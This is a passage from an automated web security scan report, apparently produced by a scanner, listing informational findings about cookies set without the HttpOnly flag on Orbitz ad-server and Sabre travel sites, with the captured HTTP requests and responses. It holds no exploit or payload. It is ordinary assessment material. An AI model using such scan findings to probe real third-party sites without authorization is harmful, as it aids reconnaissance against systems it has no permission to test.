Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba921-22275-1014137345-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 920
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 920
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...

14.271. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2623-25195-512556733-4; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 968
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 968
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...

14.272. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10899-784782887-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 920
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 920
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...

14.273. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2623-25195-1628532852-6; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 920
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 920
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...

14.274. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba024-14631-593577608-5; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 964
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 964
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=79312&AdID=151195&TargetID=41261&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,22067,
...[SNIP]...

14.275. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba124-9960-1392791335-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 140
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 140
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<img src=\"http://www.revresda.com/Marketing/Images/US/ORB/ORB_Telesales_395.jpg\" border=0 height=71 width=396 alt=\"\">');

14.276. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-17416-868641521-4; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 1016
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 1016
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=79312&AdID=151195&TargetID=41261&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,22067,
...[SNIP]...

14.277. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba124-17043-1746758895-14; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 17640

document.write('');
var imgSrc = 'http://www.orbitz.com/Marketing/Images/US/MERCH/expmod/orb/ORB_exp_Home_20110819.jpg';
var defaultHref = 'http://www.orbitz.com/event.ng/Type=click&FlightID=81494&AdI
...[SNIP]...

14.278. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba124-9960-1014433876-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 6546
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 6546
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html;charset=UTF-8\">\r\n<script src=\"http://www.revresda.com:80/DartRichMedia_1_03.js\"><\/script>\r\n<!-- Sniffer Code for Flash ver
...[SNIP]...

14.279. http://www.sabreairlinesolutions.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618452; expires=Tue, 02-Oct-2012 00:07:32 GMT; path=/; domain=www.sabreairlinesolutions.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=www.sabreairlinesolutions.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:33 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.280. http://www.sabretravelnetwork.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618439; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618472; expires=Tue, 02-Oct-2012 00:07:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:52 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.281. http://www.sabretravelnetwork.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618417; expires=Tue, 02-Oct-2012 00:06:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:06:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.282. http://www.sabretravelnetwork.com/home/products_services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the 302 response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/products_services HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621514; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:58:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621521; expires=Tue, 02-Oct-2012 00:58:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Location: http://www.sabretravelnetwork.com/home/products_services/product_index/
Content-Length: 0
Connection: close
Content-Type: text/html


14.283. http://www.sabretravelnetwork.com/home/products_services/product_index/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621525; expires=Tue, 02-Oct-2012 00:58:45 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fsearch86891abb159fbf953a%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fsearch39ea0abec86970faa3%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

14.284. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
